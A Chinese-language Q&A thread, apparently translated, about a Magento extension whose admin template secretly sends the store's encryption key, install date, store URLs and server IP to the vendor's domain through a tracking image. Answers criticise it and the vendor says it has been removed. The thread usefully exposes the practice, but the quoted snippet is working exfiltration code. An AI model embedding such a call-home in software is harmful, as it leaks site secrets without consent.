是否有充分的理由可以使模块远程访问全局/加密/密钥？

原谅我的无知，但是使用加密密钥解密Magento数据，对吗？模块有什么充分的理由来访问它吗？安装高级内容管理器后，我偶然发现了这段代码。

<div id="banana-tracker">
<?php
    $stores = Mage::app()->getStores();
    $key = (string)Mage::getConfig()->getNode('global/crypt/key');
    $date = (string)Mage::getConfig()->getNode('global/install/date');
    $serverIp = $_SERVER['SERVER_ADDR'];

    $params = 'key='.$key.'&date='.$date.'&';

    foreach($stores as $store)
    {
        $params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
    }
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />

是的……有充分的理由。
他们想知道并记录下来，以防万一。:)

您应该卸载扩展程序（很可能您已经这样做了）。无论他们向家发送了什么数据，您都不应使用“电话回国”的扩展名。

您可能要在此处列出扩展，以供其他人查看：Magento扩展中的有趣/无用/可怕的代码

我们今天收到了有关此功能的支持请求。我们已经解决了它，并删除了这段代码。我们的客户区域中的所有客户均可使用一个新版本（免费，因为我们提供无限的更新）。

我知道我们需要证明这一点，所以让我们这样做：

• 该跟踪器的目标是仅遵循未授权使用我们的扩展程序。
• 跟踪器仅显示在管理区域中（您的客户中没有一个或您和我们以外的其他任何人都无法看到它）。
• 我们也在数据库中删除了它。
• 密钥仅用于加密您的管理员密码。由于我们过去经常通过支持请求与大家一起工作，因此您可能已经通过电子邮件将您的凭据发送给我们，以寻求支持。如果我们想要您的密码，我们将直接发送给您...这不是目标。
• 即使使用了密钥，您的密码仍然是加密的。magento管理员会在某些尝试后阻止用户。

我们认识到这是一个错误，这是社区和开源系统的优势：我们可以更快地修复和改进。谢谢大家提醒我们，我们将在漏洞方面做出更多努力。